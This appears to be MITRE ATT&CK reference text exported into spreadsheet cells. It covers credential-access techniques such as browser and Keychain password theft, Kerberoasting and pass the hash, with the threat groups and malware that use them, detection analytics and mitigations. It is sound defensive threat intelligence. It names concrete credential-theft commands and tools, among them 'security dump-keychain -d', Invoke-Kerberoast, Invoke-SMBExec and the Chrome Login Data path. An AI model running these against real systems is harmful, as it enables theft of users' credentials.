[Molerats](https://attack.mitre.org/groups/G0021) used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.(Citation: DustySky)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has run tools including Browser64 to steal passwords saved in victim web browsers.(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019) [OilRig](https://attack.mitre.org/groups/G0049) has also used tool named PICKPOCKET to dump passwords from web browsers.(Citation: FireEye APT34 July 2019)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) dumped the login data database from &lt;code&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;.(Citation: Cymmetria Patchwork)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034)'s CredRaptor tool can collect saved passwords from various internet browsers.(Citation: ESET Telebots Dec 2016)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.(Citation: Citizen Lab Stealth Falcon May 2016)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used malware to gather credentials from Internet Explorer.(Citation: Proofpoint TA505 Sep 2017)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.(Citation: Zscaler APT31 Covid-19 October 2020)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can gather credentials from a number of browsers.(Citation: Bitdefender Agent Tesla April 2020) 
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can steal credentials from the victim's browser.(Citation: Unit42 Azorult Nov 2018)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Backdoor.Oldrea
Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples contain a publicly available Web browser password recovery tool.(Citation: Symantec Dragonfly)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)
Carberp
[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.(Citation: Prevx Carberp March 2011)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) steals credentials stored inside Internet Explorer.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) can steal login credentials and stored financial information from the browser.(Citation: Cybereason Chaes Nov 2020)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) can steal saved usernames and passwords in Chrome as well as credit card credentials.(Citation: Unit42 CookieMiner Jan 2019)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including Web browsers.(Citation: F-Secure The Dukes)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a module to steal credentials from Web browsers on the victim machine.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)(Citation: IBM IcedID November 2017)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use modules that extract passwords from common web browsers such as Firefox and Chrome.(Citation: Github PowerShell Empire)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can steal cookie data and credentials from Google Chrome.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.(Citation: Cisco H1N1 Part 2)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)
Javali
[Javali](https://attack.mitre.org/software/S0528) can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.(Citation: Securelist Brazilian Banking Malware July 2020)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.(Citation: Cybereason Kimsuky November 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) can steal profiles (containing credential information) from Firefox, Chrome, and Opera.(Citation: Talos Konni May 2017)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) attempts to collect passwords from browsers.(Citation: Rapid7 KeyBoy Jun 2013)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has a module to collect usernames and passwords stored in browsers.(Citation: BiZone Lizar May 2021)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)
Machete
[Machete](https://attack.mitre.org/software/S0409) collects stored credentials from several web browsers.(Citation: ESET Machete July 2019) 
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) has the ability to steal credentials from web browsers.(Citation: Securelist Brazilian Banking Malware July 2020)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)	
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)
OLDBAIT
[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.(Citation: FireEye APT28)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain stored credentials from web browsers.(Citation: Talos Olympic Destroyer 2018)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)
PinchDuke
[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer. (Citation: F-Secure The Dukes)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)
Prikormka
A module in [Prikormka](https://attack.mitre.org/software/S0113) gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.(Citation: ESET Operation Groundbait)
Proton
[Proton](https://attack.mitre.org/software/S0279) gathers credentials for Google Chrome.(Citation: objsee mac malware 2017)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has collected usernames and passwords from Firefox and Chrome.(Citation: Kaspersky QakBot September 2021)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common web browsers.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can steal credentials stored in Web browsers by querying the sqlite database.(Citation: Talos Group123)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use tools to collect credentials from web browsers.(Citation: Bitdefender Naikon April 2021)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) can gather browser usernames and passwords.(Citation: Accenture Hogfish April 2018)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect clear text web credentials for Internet Explorer/Edge.(Citation: GitHub SILENTTRINITY Modules July 2019)
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042) variants have harvested credentials from browsers such as Firefox, Chrome, Opera, and Edge.(Citation: Mandiant UNC3890 Aug 2022)
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) searches for credentials stored from web browsers.(Citation: Talos Smoke Loader July 2018)
TSCookie
[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using [esentutl](https://attack.mitre.org/software/S0404).(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can steal data and credentials from browsers.(Citation: Secureworks Karagany July 2019)
Unknown Logger
[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of stealing usernames and passwords from browsers on the victim machine.(Citation: Forcepoint Monsoon)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)
XAgentOSX
[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getFirefoxPassword function to attempt to locate Firefox passwords.(Citation: XAgentOSX 2017)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.(Citation: ESET Zebrocy May 2019)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.(Citation: Kaspersky Adwind Feb 2016)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has a module that steals passwords saved in victim web browsers.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands with arguments that may be used to collect Keychain data from a system to acquire credentials.
File Access
Monitor for Keychain files being accessed that may be related to malicious credential collection.
OS API Execution
Monitor for Keychain Services API calls, specifically legacy extensions such as &lt;code&gt;SecKeychainFindInternetPassword&lt;/code&gt;, that may collect Keychain data from a system to acquire credentials.(Citation: Keychain Items Apple Dev API)
Process Creation
Monitor processes spawned by command line utilities to manipulate keychains directly, such as &lt;code&gt;security&lt;/code&gt;, combined with arguments to collect passwords, such as &lt;code&gt;dump-keychain -d&lt;/code&gt;.
Password Policies
The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.
Calisto
[Calisto](https://attack.mitre.org/software/S0274) collects Keychain storage data and copies those passwords/tokens to a file.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can use Keychain Services API functions to find and collect passwords, such as `SecKeychainFindInternetPassword` and `SecKeychainItemCopyAttributesAndData`.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)	
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can dump credentials from the macOS keychain.(Citation: ESET DazzleSpy Jan 2022)
Proton
[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for keychains.(Citation: objsee mac malware 2017)
iKitten
[iKitten](https://attack.mitre.org/software/S0278) collects the keychains on the system.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may acquire user credentials from third-party password managers. (Citation: ise Password Manager February 2019)
File Access
Monitor file reads that may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)
OS API Execution
Monitor for API calls that may search for common password storage locations to obtain user credentials.
Process Access
Monitor process being accessed that may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)
Password Policies
Refer to NIST guidelines when creating password policies for master passwords.(Citation: NIST 800-63-3)
Software Configuration
Consider re-locking password managers after a short timeout to limit the time plaintext credentials live in memory from decrypted databases.
Update Software
Update password managers regularly by employing patch management for internal enterprise endpoints and servers.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors accessed and collected credentials from password managers.(Citation: FoxIT Wocao December 2019)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used scripts to access credential information from the KeePass database.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has accessed local password managers and databases to obtain further credentials from a compromised network.(Citation: NCC Group LAPSUS Apr 2022)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) obtained a KeePass database from a compromised host.(Citation: Trend Micro DRBControl February 2020)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can gather information from the Keepass password manager.(Citation: Kaspersky Ferocious Kitten Jun 2021) 
Proton
[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for 1password.(Citation: objsee mac malware 2017)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor for anomalous Kerberos activity, such as enabling Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).
Encrypt Sensitive Information
Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Password Policies
Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire.(Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Privileged Account Management
Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [PowerSploit](https://attack.mitre.org/software/S0194)'s `Invoke-Kerberoast` module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.(Citation: Microsoft Deep Dive Solorigate January 2021)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used Kerberoasting PowerShell commands such as, `Invoke-Kerberoast` for credential access and to enable lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.(Citation: DFIR Ryuk's Return October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Mandiant FIN12 Oct 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can decode Kerberos 5 tickets and convert it to hashcat format for subsequent cracking.(Citation: Palo Alto Brute Ratel July 2022)
Empire
[Empire](https://attack.mitre.org/software/S0363) uses [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; to request service tickets and return crackable ticket hashes.(Citation: Github PowerShell Empire)
Impacket
[Impacket](https://attack.mitre.org/software/S0357) modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.(Citation: Impacket Tools)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; module can request service tickets and return crackable ticket hashes.(Citation: PowerSploit Invoke Kerberoast)(Citation: Harmj0y Kerberoast Nov 2016)
Rubeus
[Rubeus](https://attack.mitre.org/software/S1071) can use the `KerberosRequestorSecurityToken.GetRequest` method to request kerberoastable service tickets.(Citation: GitHub Rubeus March 2023)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) contains a module to conduct Kerberoasting.(Citation: GitHub SILENTTRINITY Modules July 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor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A remote desktop logon, through [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001), may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.
Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.
Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista. Logon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft’s Audit Logon Events page.
&lt;h4&gt;Analytic 1 - Remote Desktop Logon&lt;/h4&gt;
&lt;code&gt;suspicious_netconn = filter network_connections where (event_id = “4624" AND AuthenticationPackageName = 'Negotiate' AND Severity = "Information" AND logon_type = "10")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Simultaneous Logins on a Host&lt;/h4&gt;
&lt;code&gt;users_grouped = group users_list by hostname
users_grouped = from users_grouped select min(time) as earliest_time, max(time) as latest_time count(user) as user_count
multiple_logins = filter users_grouped where (latest_time - earliest_time &lt;= 1 hour and user_count &gt; 1)&lt;/code&gt;
Logon Session Metadata
Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
User Account Authentication
Monitor for an attempt by a user to gain access to a network or computing resource, often by the use of domain authentication services, such as the System Security Services Daemon (sssd) on Linux.
Notes: For Linux, auditing frameworks such as the audit daemon (auditd) can be used to alert on changes to log files that track authentication attempts, including &lt;code&gt;/var/log/secure&lt;/code&gt;.
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Audit local accounts permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) Limit the usage of local administrator accounts to be used for day-to-day operations that may expose them to potential adversaries. 
For example, audit the use of service accounts in Kubernetes, and avoid automatically granting them access to the Kubernetes API if this is not required.(Citation: Kubernetes Service Accounts) Implementing LAPS may also help prevent reuse of local administrator credentials across a domain.(Citation: Microsoft Remote Use of Local)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used local account credentials found during the intrusion for lateral movement and privilege escalation.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used compromised local accounts to access victims' networks.(Citation: CrowdStrike StellarParticle January 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used legitimate local admin account credentials.(Citation: FireEye APT32 May 2017)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has moved laterally using the Local Administrator account.(Citation: FireEye FIN10 June 2017)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.(Citation: FireEye Exchange Zero Days March 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.(Citation: Netscout Stolen Pencil Dec 2018)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created admin accounts on a compromised host.(Citation: Bitdefender StrongPity June 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used known administrator account credentials to execute the backdoor directly.(Citation: TrendMicro Tropic Trooper May 2020)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) has abused local accounts that have the same password across the victim’s network.(Citation: ESET Crutch December 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a local user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) can brute force a local admin password, then use it to facilitate lateral movement.(Citation: Malwarebytes Emotet Dec 2017)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) can use valid credentials with [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt; to spread itself to remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)
Umbreon
[Umbreon](https://attack.mitre.org/software/S0221) creates valid local users to provide access to the system.(Citation: Umbreon Trend Micro)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other service artifacts that provide context of user authentication to web applications, including cloud-based services. Combine this information with web credentials usage events to identify authentication events that do not fit the organization baseline.
Web Credential Usage
Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.
Software Configuration
Configure browsers or tasks to regularly delete persistent cookies.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used stolen cookies to access cloud resources and a forged `duo-sid` cookie to bypass MFA set on an email account.(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
Monitor requests of new ticket granting ticket or service tickets to a Domain Controller. Windows Security events such as 4768 (A Kerberos authentication ticket (TGT) was requested) and 4769 (A Kerberos service ticket was requested) combined with logon session creation information may be indicative of an overpass the hash attempt.
Logon Session Creation
Monitor newly created logons and credentials used in events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Note: Analytic Event ID is for Windows Security Log (Event ID 4624 - An account was successfully logged on). The successful use of Pass the Hash for lateral movement between workstations would trigger Event ID 4624, with an event level of Information, from the Windows Security log. This event would show an account logon with a LogonType of 3 using NTLM authentication, a logon that is not a domain logon, and the user account not being the ANONYMOUS LOGON account.
&lt;h4&gt;Analytic 1&lt;/h4&gt;
&lt;code&gt;logons = filter log_events where (
event_id== "4624" AND 
target_user_name != "ANONYMOUS LOGON" AND
authentication_package_name == "NTLM") &lt;/code&gt;
User Account Authentication
Monitor for user authentication attempts. From a classic Pass-The-Hash perspective, this technique uses a hash through the NTLMv1 / NTLMv2 protocol to authenticate against a compromised endpoint. This technique does not touch Kerberos. Therefore, NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. From an Over-Pass-The-Hash perspective, an adversary wants to exchange the hash for a Kerberos authentication ticket (TGT). One way to do this is by creating a sacrificial logon session with dummy credentials (LogonType 9) and then inject the hash into that session which triggers the Kerberos authentication process.
Privileged Account Management
Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform Lateral Movement between systems.
Update Software
Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.(Citation: NSA Spotting) 
User Account Control
Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt;.
Through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons.(Citation: GitHub IAD Secure Host Baseline UAC Filtering)
User Account Management
Do not allow a domain user to be in the local administrator group on multiple systems.
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.(Citation: McAfee Night Dragon)
APT1
The [APT1](https://attack.mitre.org/groups/G0006) group is known to have used pass the hash.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used pass the hash for lateral movement.(Citation: Microsoft SIR Vol 19)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used pass the hash for lateral movement.(Citation: Cybereason Cobalt Kitty 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has dumped password hashes for use in pass the hash authentication attacks.(Citation: NCC Group Chimera January 2021)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used the PowerShell utility `Invoke-SMBExec` to execute the pass the hash method for lateral movement within an compromised environment.(Citation: Mandiant FIN13 Aug 2022)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used dumped hashes to authenticate to other machines via pass the hash.(Citation: Cybereason Soft Cell June 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used pass the hash for authentication to remote access software used in C2.(Citation: CISA AA20-301A Kimsuky)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the `Invoke-SMBExec` PowerShell cmdlet to execute the pass-the-hash technique and utilized stolen password hashes to move laterally.(Citation: Mandiant FIN12 Oct 2021)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can perform pass the hash on compromised machines with x64 versions.(Citation: BitDefender BADHATCH Mar 2021) 
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform pass the hash.(Citation: Cobalt Strike TTPs Dec 2017)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can pass the hash to authenticate via SMB.(Citation: CME Github September 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) can perform pass the hash attacks.(Citation: Github PowerShell Empire)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed loading several APIs associated with Pass the Hash.(Citation: US-CERT HOPLIGHT Apr 2019)	
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;SEKURLSA::Pth&lt;/code&gt; module can impersonate a user, with only a password hash, to execute arbitrary commands.(Citation: Adsecurity Mimikatz Guide)(Citation: NCSC Joint Report Public Tools)(Citation: Cobalt Strike Manual 4.3 November 2020)
Pass-The-Hash Toolkit
[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) can perform pass the hash.(Citation: Mandiant APT1)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that leverage pass the hash for lateral movement.(Citation: GitHub PoshC2)
</t>
  </si>
  <si>
    <t xml:space="preserve">Web Credential Usage
Monitor the use of application access tokens to interact with resources or services that do not fit the organization baseline. For example, an application that is not meant to read emails accessing users’ mail boxes and potentially exfiltrating sensitive data, or a token associated with a cloud service account being used to make API calls from an IP address outside of the cloud environment.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Audit
Administrators should audit all cloud and container accounts to ensure that they are necessary and that the permissions granted to them are appropriate. Where possible, the ability to request temporary account tokens on behalf of another accounts should be disabled. Additionally, administrators can leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.
Encrypt Sensitive Information
File encryption should be enforced across email communications containing sensitive information that may be obtained through access to email services.
Restrict Web-Based Content
Update corporate policies to restrict what types of third-party applications may be added to any online service or tool that is linked to the company's information, accounts or network (e.g., Google, Microsoft, Dropbox, Basecamp, GitHub). However, rather than providing high-level guidance on this, be extremely specific—include a list of per-approved applications and deny all others not on the list. Administrators may also block end-user consent through administrative portals, such as the Azure Portal, disabling users from authorizing third-party apps through OAuth and forcing administrative consent.(Citation: Microsoft Azure AD Admin Consent)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used compromised service principals to make changes to the Office 365 environment.(Citation: CrowdStrike StellarParticle January 2022)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.(Citation: Trend Micro Pawn Storm OAuth 2017)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can use legitimate OAuth refresh tokens to authenticate with OneDrive.(Citation: Microsoft POLONIUM June 2022)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Credential Request
